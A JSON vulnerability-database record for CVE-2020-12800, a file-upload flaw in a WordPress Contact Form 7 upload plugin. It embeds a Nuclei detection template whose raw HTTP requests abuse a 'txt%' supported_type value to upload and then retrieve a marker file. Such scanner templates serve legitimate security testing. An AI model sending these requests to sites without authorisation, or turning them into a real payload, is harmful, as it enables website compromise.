{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-12800/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-12800/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-12800/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-12800/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-12800/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-12800"},"sightings":{"href":"/api/v1/sightings/cve-2020-12800"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.78608,"kev":false,"percentile":0.99567},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-12800.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-12800\n\ninfo:\n  name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution\n  author: dwisiswant0\n  severity: critical\n  description: |\n    WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.\n  remediation: |\n    Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-12800\n    - https://github.com/amartinsec/CVE-2020-12800\n    - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html\n    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-12800\n    cwe-id: CWE-434\n    epss-score: 0.78608\n    epss-percentile: 0.99567\n    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 2\n    vendor: codedropz\n    product: drag_and_drop_multiple_file_upload_-_contact_form_7\n    framework: wordpress\n  tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\n        X-Requested-With: XMLHttpRequest\n\n        -----------------------------350278735926454076983690555601\n        Content-Disposition: form-data; name=\"supported_type\"\n\n        txt%\n        -----------------------------350278735926454076983690555601\n        Content-Disposition: form-data; name=\"size_limit\"\n\n        5242880\n        -----------------------------350278735926454076983690555601\n        Content-Disposition: form-data; name=\"action\"\n\n        dnd_codedropz_upload\n        -----------------------------350278735926454076983690555601\n        Content-Disposition: form-data; name=\"type\"\n\n        click\n        -----------------------------350278735926454076983690555601\n        Content-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\n        Content-Type: application/x-httpd-php\n\n        CVE-2020-12800-{{randstr}}\n        -----------------------------350278735926454076983690555601--\n      - |\n        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - \"CVE-2020-12800-{{randstr}}\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100819e996068243908db7fe8958aed4142408dc559ef402421af59e9dc988f530502210085c5af67af1e36952335eec8face8298aa0a9bb3a03057a502695acd02a7e466:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-12800"}